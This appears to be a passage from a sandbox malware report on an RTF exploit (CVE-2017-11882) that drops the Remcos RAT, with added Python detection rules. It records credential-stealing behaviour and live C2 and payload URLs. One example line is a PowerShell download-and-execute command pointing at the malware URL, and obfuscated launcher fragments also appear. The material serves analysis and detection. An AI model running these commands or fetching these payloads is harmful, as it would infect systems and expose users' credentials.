                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: ESMTPPassword 14_2_004033F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 14_2_00402DB3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 14_2_00402DB3
                  Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 3980, type: MEMORYSTR
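The rows in this section and the process-creation rows before it describe one chain: Equation Editor starts wscript.exe, which starts two PowerShell stages, which start RegAsm.exe, which re-launches itself with `/stext` and a temp-file path while the children read browser credential stores and mail-client profile keys. As an added example (the editor's code, not from the report), the Python below runs simple detection rules over constructed process and file-open telemetry built from those rows. PIDs are invented, the base64 blob and the long obfuscated body are shortened, and a benign chrome.exe is added as a control so the credential-store rule is seen to key on the reading process rather than on the path alone.

```python
import ntpath
import re
from dataclasses import dataclass


@dataclass
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str = ""


@dataclass
class FileOpen:
    pid: int
    path: str


# Constructed telemetry. Images, command lines and paths follow the report;
# PIDs are invented, the base64 blob and the obfuscated body are shortened,
# and chrome.exe (pid 9) is a benign control that does not appear in the report.
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
PROCS = [
    Proc(2, 1, r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"),
    Proc(3, 2, r"C:\Windows\SysWOW64\wscript.exe",
         r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS"'),
    Proc(4, 3, PS, r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '<base64 elided in report>';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD'''),
    Proc(5, 4, PS, r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $pSHOmE[4]+$PSHOME[34]+'X')( (...) )"'''),
    Proc(6, 5, REGASM, '"' + REGASM + '"'),
    Proc(7, 6, REGASM, REGASM + r' /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf"'),
    Proc(8, 6, REGASM, REGASM + r' /stext "C:\Users\user\AppData\Local\Temp\qjmo"'),
    Proc(9, 1, r"C:\Program Files\Google\Chrome\Application\chrome.exe"),
]
FILES = [
    FileOpen(7, r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    FileOpen(7, r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db"),
    FileOpen(8, r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"),
    FileOpen(9, r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
]

# Credential stores the report shows RegAsm.exe opening (lower-case suffixes).
CRED_STORES = (
    r"\google\chrome\user data\default\login data",
    r"\google\chrome\user data\default\web data",
    r"\mozilla\firefox\profiles.ini",
    r"\key3.db", r"\cert8.db", r"\secmod.db", r"\places.sqlite",
)
BROWSERS = {"chrome.exe", "firefox.exe"}


def base(image: str) -> str:
    # ntpath so Windows paths split correctly even when this runs on Linux.
    return ntpath.basename(image).lower()


def detect(procs, files):
    """Return (rule, pid) pairs for each stage of the chain in the report."""
    by_pid = {p.pid: p for p in procs}
    hits = []
    for p in procs:
        img, cmd = base(p.image), p.cmdline.lower()
        parent = by_pid.get(p.ppid)
        pimg = base(parent.image) if parent else ""
        if pimg == "eqnedt32.exe":  # Equation Editor should never spawn anything
            hits.append(("equation_editor_spawns_process", p.pid))
        if img == "powershell.exe":
            if "frombase64string" in cmd and cmd.count("powershell.exe") >= 2:
                hits.append(("powershell_base64_relaunch", p.pid))
            if "-executionpolicy bypass" in cmd:
                hits.append(("powershell_execution_policy_bypass", p.pid))
            if re.search(r"\$pshome\[\d+\]", cmd):  # $PSHOME[n] indexing builds 'iex'
                hits.append(("powershell_pshome_index_obfuscation", p.pid))
        if img == "regasm.exe":
            if pimg == "powershell.exe":  # bare RegAsm.exe as a hollowing host
                hits.append(("powershell_spawns_regasm", p.pid))
            if "/stext" in cmd:  # recovery module dumping credentials to a temp file
                hits.append(("regasm_stext_credential_module", p.pid))
    for f in files:
        proc = by_pid.get(f.pid)
        if proc and base(proc.image) not in BROWSERS and f.path.lower().endswith(CRED_STORES):
            hits.append(("non_browser_reads_credential_store", f.pid))
    return hits


def chain(procs, pid):
    """Walk ppid links from pid to the root; image basenames, child first."""
    by_pid = {p.pid: p for p in procs}
    out = []
    while pid in by_pid:
        out.append(base(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return out


if __name__ == "__main__":
    for rule, pid in detect(PROCS, FILES):
        print(f"{rule:40s} pid={pid}  chain={' <- '.join(chain(PROCS, pid))}")
```

Each rule on its own is noisy in a real estate (PowerShell with `-executionpolicy bypass` is common in administration scripts); the value is in correlating them along the parent chain that `chain()` reconstructs, which here runs from the `/stext` child all the way back to EQNEDT32.EXE.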

                  Remote Access Functionality

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-7B1J99
Source: Yara match | File source: 8.2.powershell.exe.439db68.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.powershell.exe.63d0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.powershell.exe.63d0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.powershell.exe.439db68.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.385255527.00000000063D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.383266190.0000000004289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 8.2.powershell.exe.3cf0b60.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.powershell.exe.3cf0b60.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.884633008.0000000000795000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.884633008.00000000007C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.884633008.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.383266190.0000000003889000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3680, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3792, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: cmd.exe | 9_2_0040569A
MITRE ATT&CK Matrix (the matrix was flattened by extraction; it is rebuilt here one tactic column per line, cells listed top to bottom). A bracketed number is the report's match count for that technique, reproduced as extracted; cells without one are matrix template entries with no matches.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
Resource Development: Scripting [111]; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
Execution: Native API [11]; Exploitation for Client Execution [43]; Command and Scripting Interpreter [122]; Service Execution [2]; PowerShell [3]; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
Persistence: Scripting [111]; DLL Side-Loading [1]; Windows Service [1]; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Privilege Escalation: DLL Side-Loading [1]; Bypass User Account Control [1]; Access Token Manipulation [1]; Windows Service [1]; Process Injection [422]; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Defense Evasion: Deobfuscate/Decode Files or Information [11]; Obfuscated Files or Information [2]; Install Root Certificate [1]; DLL Side-Loading [1]; Bypass User Account Control [1]; Masquerading [1]; Modify Registry [1]; Virtualization/Sandbox Evasion [21]; Access Token Manipulation [1]; Process Injection [422]; Stripped Payloads
Credential Access: OS Credential Dumping [2]; Input Capture [111]; Credentials in Registry [2]; Credentials In Files [3]; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
Discovery: System Time Discovery [2]; Account Discovery [1]; System Service Discovery [1]; File and Directory Discovery [4]; System Information Discovery [38]; Security Software Discovery [3]; Virtualization/Sandbox Evasion [21]; Process Discovery [4]; Application Window Discovery [1]; System Owner/User Discovery [1]; Remote System Discovery [1]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
Collection: Archive Collected Data [11]; Data from Local System [1]; Email Collection [2]; Input Capture [111]; Clipboard Data [3]; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
Command and Control: Ingress Tool Transfer [13]; Encrypted Channel [21]; Remote Access Software [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [213]; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
Impact: System Shutdown/Reboot [1]; Defacement [1]; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
Behavior Graph ID: 1519296 | Sample: SecuriteInfo.com.Exploit.CV... | Startdate: 26/09/2024 | Architecture: WINDOWS | Score: 100

Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 21 other signatures

Process tree as drawn in the graph (the numbers in parentheses are the counts shown on each process node, i.e. created registry values and created files per the legend above; network, dropped-file and signature nodes are listed under the process they hang off):

WINWORD.EXE (291, 13)
  EQNEDT32.EXE (12)
    network: 185.29.10.52, ports 49161, 49163, 80 (DATACLUB-SE, European Union)
    dropped: C:\...\makepicturewithgreatthingstobeon.vBS (Unicode)
    signatures: Office equation editor establishes network connection; Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
    wscript.exe (1)
      signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Bypasses PowerShell execution policy; 2 other signatures
      powershell.exe (4)
        signatures: Suspicious powershell command line found; Obfuscated command line found; Suspicious execution chain found
        powershell.exe (12, 5)
          network: ia600100.us.archive.org 207.241.227.240, ports 443, 49162 (INTERNET-ARCHIVEUS, United States)
          signatures: Installs new ROOT certificates; Writes to foreign memory regions; Injects a PE file into a foreign processes
          RegAsm.exe (3, 10)
            network: authurremc.duckdns.org (Uses dynamic DNS services); authurremc.duckdns.org 192.210.150.29, ports 14645, 49164, 49165 (AS-COLOCROSSINGUS, United States); geoplugin.net 178.237.33.50, ports 49166, 80 (ATOM86-ASATOM86NL, Netherlands)
            signatures: Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Tries to steal Mail credentials (via file registry); 7 other signatures
            RegAsm.exe (1)
              signatures: Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file / registry access); Searches for Windows Mail specific files
            RegAsm.exe
            RegAsm.exe
              signatures: Tries to harvest and steal browser information (history, passwords, etc)
            6 other processes
  EQNEDT32.EXE
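The chain the graph records (WINWORD.EXE -> EQNEDT32.EXE -> wscript.exe -> powershell.exe -> powershell.exe -> RegAsm.exe, with EQNEDT32.EXE and RegAsm.exe opening network connections) maps onto a small set of process-tree rules. The Python below is an added example of that detection logic; it is not part of the Joe Sandbox report or its signature set. The events, PIDs, paths and command lines are constructed (Sysmon-style fields), the -EncodedCommand payload is an assumed stage-2 loader that merely reuses the download URL from this report rather than the sample's real command line, and the rule names are the author's own, not the report's signature names.

```python
"""Process-tree detections for the EQNEDT32.EXE -> wscript -> powershell -> RegAsm chain.

Added example with constructed telemetry (Sysmon-style fields), not data from the report.
Event id 1 = process creation, id 3 = network connection.
"""
import base64
import ntpath
import re

EXPLORER = r"C:\Windows\explorer.exe"
WORD = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
EQN = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
WSCRIPT = r"C:\Windows\System32\wscript.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
CMD = r"C:\Windows\System32\cmd.exe"

# Assumed stage-2 loader text; only the download URL comes from the report.
STAGE2 = ("IEX (New-Object Net.WebClient).DownloadString("
          "'https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt')")


def encode_command(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


EVENTS = [  # constructed sample telemetry
    {"id": 1, "pid": 100, "ppid": 1, "image": EXPLORER, "cmd": "explorer.exe"},
    {"id": 1, "pid": 200, "ppid": 100, "image": WORD, "cmd": 'WINWORD.EXE "sample.rtf"'},
    {"id": 1, "pid": 300, "ppid": 200, "image": EQN, "cmd": "EQNEDT32.EXE -Embedding"},
    {"id": 3, "pid": 300, "dst_ip": "185.29.10.52", "dst_port": 80},
    {"id": 1, "pid": 400, "ppid": 300, "image": WSCRIPT,
     "cmd": r'wscript.exe "C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS"'},
    {"id": 1, "pid": 500, "ppid": 400, "image": PS,
     "cmd": "powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden "
            "-EncodedCommand " + encode_command(STAGE2)},
    {"id": 1, "pid": 600, "ppid": 500, "image": PS,
     "cmd": 'powershell.exe -NoProfile -WindowStyle Hidden -Command "Start-Sleep -Seconds 1"'},
    {"id": 1, "pid": 700, "ppid": 600, "image": REGASM, "cmd": "RegAsm.exe"},
    {"id": 3, "pid": 700, "dst_ip": "192.210.150.29", "dst_port": 14645},
    # Benign control: an interactive PowerShell session with ordinary arguments.
    {"id": 1, "pid": 800, "ppid": 100, "image": CMD, "cmd": "cmd.exe"},
    {"id": 1, "pid": 900, "ppid": 800, "image": PS, "cmd": "powershell.exe Get-Service -Name BITS"},
]

# -ep/-ex/-exec/-ExecutionPolicy Bypass and -e/-ec/-enc/-EncodedCommand <base64>
BYPASS = re.compile(r"-e(p|x|xec|xecutionpolicy)?\s+bypass", re.I)
ENCODED = re.compile(r"-e(c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def basename(image: str) -> str:
    return ntpath.basename(image).lower()


def decode_encoded_command(cmd: str):
    """Decoded -EncodedCommand payload, or None when absent or not valid base64/UTF-16LE."""
    m = ENCODED.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def has_arguments(cmd: str, image: str) -> bool:
    """False when the command line is nothing but the executable, bare or quoted."""
    return cmd.strip().strip('"').lower() not in (image.lower(), basename(image))


def ancestry(procs, pid):
    """Image basenames of pid and its ancestors, nearest first; stops at unknown or cyclic PIDs."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(basename(procs[pid]["image"]))
        pid = procs[pid]["ppid"]
    return chain


def detect(events):
    """Apply the rules; returns {rule_name: [(pid, detail), ...]} in event order."""
    procs = {e["pid"]: e for e in events if e["id"] == 1}
    findings = {}

    def hit(rule, pid, detail=""):
        findings.setdefault(rule, []).append((pid, detail))

    for e in events:
        pid = e["pid"]
        if e["id"] == 1:
            me = basename(e["image"])
            parent = procs.get(e["ppid"])
            pbase = basename(parent["image"]) if parent else ""
            if pbase == "eqnedt32.exe":  # the equation editor has no business spawning anything
                hit("equation_editor_child_process", pid, me)
            if me == "powershell.exe":
                if pbase == "wscript.exe":
                    hit("wscript_spawns_powershell", pid)
                if BYPASS.search(e["cmd"]):
                    hit("powershell_execution_policy_bypass", pid)
                decoded = decode_encoded_command(e["cmd"])
                if decoded is not None:
                    hit("powershell_encoded_command", pid, decoded)
            if me == "regasm.exe" and pbase == "powershell.exe" and not has_arguments(e["cmd"], e["image"]):
                hit("regasm_without_arguments_from_powershell", pid)  # hollowed injection host
        elif e["id"] == 3:
            chain = ancestry(procs, pid)
            dest = f'{e["dst_ip"]}:{e["dst_port"]}'
            if chain and chain[0] == "eqnedt32.exe":
                hit("equation_editor_network_connection", pid, dest)
            elif "eqnedt32.exe" in chain:
                hit("network_from_equation_editor_descendant", pid, dest)
    return findings


if __name__ == "__main__":
    for rule, hits in detect(EVENTS).items():
        for pid, detail in hits:
            print(f"{rule:45} pid={pid} {detail}")
```

The ancestry walk is what makes the last rule useful: RegAsm.exe on its own is a signed Microsoft binary, and powershell.exe with an empty-argument child is only mildly odd, but a network connection from any process whose lineage passes through EQNEDT32.EXE is the "Document exploit detected" condition regardless of how many interpreters sit in between. The benign cmd.exe -> powershell.exe session in the sample produces no findings.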



Source | Detection | Scanner | Label
SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf | 39% | ReversingLabs | Document-RTF.Exploit.CVE-2017-11882
No Antivirus matches (reported three times, once for each of the report's remaining scan tables)

Source | Detection | Scanner | Label
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
http://geoplugin.net/json.gp/C | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://geoplugin.net/json.gp | 0% | URL Reputation | safe
http://crl.entrust.net/2048ca.crl0 | 0% | URL Reputation | safe
http://b.scorecardresearch.com/beacon.js | 0% | Avira URL Cloud | safe
https://support.google.com/chrome/?p=plugin_flash | 0% | Avira URL Cloud | safe
https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9 | 0% | Avira URL Cloud | safe
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1 | 0% | Avira URL Cloud | safe
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_ | 0% | Avira URL Cloud | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | Avira URL Cloud | safe
http://www.imvu.comr | 0% | Avira URL Cloud | safe
http://acdn.adnxs.com/ast/ast.js | 0% | Avira URL Cloud | safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | Avira URL Cloud | safe
http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png | 0% | Avira URL Cloud | safe
http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html | 0% | Avira URL Cloud | safe
https://deff.nelreports.net/api/report?cat=msn | 0% | Avira URL Cloud | safe
http://www.nirsoft.net | 0% | Avira URL Cloud | safe
http://go.micros | 0% | Avira URL Cloud | safe
http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683 | 0% | Avira URL Cloud | safe
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js | 0% | Avira URL Cloud | safe
http://www.nirsoft.netP | 0% | Avira URL Cloud | safe
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | 0% | Avira URL Cloud | safe
http://www.imvu.com/qK | 0% | Avira URL Cloud | safe
http://cache.btrll.com/default/Pix-1x1.gif | 0% | Avira URL Cloud | safe
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt | 100% | Avira URL Cloud | malware
http://185.29.10.52/550/makepicturewithgreatthingstobeonline.tIFj | 0% | Avira URL Cloud | safe
https://www.google.com | 0% | Avira URL Cloud | safe
http://cdn.taboola.com/libtrc/msn-home-network/loader.js | 0% | Avira URL Cloud | safe
http://o.aolcdn.com/ads/adswrappermsni.js | 0% | Avira URL Cloud | safe
http://www.msn.com/?ocid=iehp | 0% | Avira URL Cloud | safe
https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033 | 0% | Avira URL Cloud | safe
authurremc.duckdns.org | 100% | Avira URL Cloud | malware
http://static.chartbeat.com/js/chartbeat.js | 0% | Avira URL Cloud | safe
http://www.msn.com/de-de/?ocid=iehp | 0% | Avira URL Cloud | safe
https://ia600100.us.archive.org | 0% | Avira URL Cloud | safe
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto% | 0% | Avira URL Cloud | safe
http://www.nirsoft.net/ | 0% | Avira URL Cloud | safe
https://login.yahoo.com/config/login | 0% | Avira URL Cloud | safe
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683 | 0% | Avira URL Cloud | safe
https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3 | 0% | Avira URL Cloud | safe
http://ocsp.entrust.net0D | 0% | Avira URL Cloud | safe
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh | 0% | Avira URL Cloud | safe
http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids( | 0% | Avira URL Cloud | safe
https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9 | 0% | Avira URL Cloud | safe
http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js | 0% | Avira URL Cloud | safe
https://www.ccleaner.com/go/app_cc_pro_trialkey | 0% | Avira URL Cloud | safe
http://crl.entrust.net/server1.crl0 | 0% | Avira URL Cloud | safe
http://185.29.10.52/550/makepicturewithgreatthingstobeonline.tIFAs4 | 0% | Avira URL Cloud | safe
http://www.imvu.com | 0% | Avira URL Cloud | safe
https://contextual.media.net/8/nrrV73987.js | 0% | Avira URL Cloud | safe
http://185.29.10.52 | 0% | Avira URL Cloud | safe
http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js | 0% | Avira URL Cloud | safe
http://185.29.10.52/550/makepicturewithgreatthingstobeonline.tIFsC: | 0% | Avira URL Cloud | safe
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2 | 0% | Avira URL Cloud | safe
https://contextual.media.net/ | 0% | Avira URL Cloud | safe
http://www.msn.com/ | 0% | Avira URL Cloud | safe
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtVUF;HqRbase64Content | 0% | Avira URL Cloud | safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au | 0% | Avira URL Cloud | safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | Avira URL Cloud | safe
http://www.imvu.com/GK | 0% | Avira URL Cloud | safe
http://185.29.10.52/550/makepicturewithgreatthingstobeonline.tIF | 0% | Avira URL Cloud | safe
https://www.google.com/accounts/servicelogin | 0% | Avira URL Cloud | safe
https://secure.comodo.com/CPS0 | 0% | Avira URL Cloud | safe
http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset | 0% | Avira URL Cloud | safe
https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549 | 0% | Avira URL Cloud | safe
http://cdn.at.atwola.com/_media/uac/msn.html | 0% | Avira URL Cloud | safe
https://policies.yahoo.com/w3c/p3p.xml | 0% | Avira URL Cloud | safe
http://www.ebuddy.com | 0% | Avira URL Cloud | safe
http://www.msn.com/advertisement.ad.js | 0% | Avira URL Cloud | safe
http://185.29.10.52/550/RGBV.txt | 0% | Avira URL Cloud | safe

Only two entries in this table are scored: the stage-2 text file on ia600100.us.archive.org and the dynamic-DNS C2 name authurremc.duckdns.org (100%, malware). The stage-1 download URLs on 185.29.10.52 are scored 0%/safe, which only says that no reputation entry exists for them; the behaviour graph shows EQNEDT32.EXE fetching from that host, so they are indicators regardless of this column. Entries such as http://ocsp.entrust.net03, http://crl.entrust.net/2048ca.crl0 and http://go.micros are strings lifted from process memory, and their stray trailing or missing characters are string-extraction artefacts rather than part of any URL; the msn.com, taboola and media.net entries are advertising and analytics URLs carved from browser cache files in the analysis VM, not infrastructure used by the sample.
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ia600100.us.archive.org | 207.241.227.240 | true | false | - | unknown
geoplugin.net | 178.237.33.50 | true | false | - | unknown
authurremc.duckdns.org | 192.210.150.29 | true | true | - | unknown

Name | Malicious | Antivirus Detection | Reputation
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt | false | Avira URL Cloud: malware | unknown
authurremc.duckdns.org | true | Avira URL Cloud: malware | unknown
http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
http://185.29.10.52/550/makepicturewithgreatthingstobeonline.tIF | true | Avira URL Cloud: safe | unknown
http://185.29.10.52/550/RGBV.txt | true | Avira URL Cloud: safe | unknown
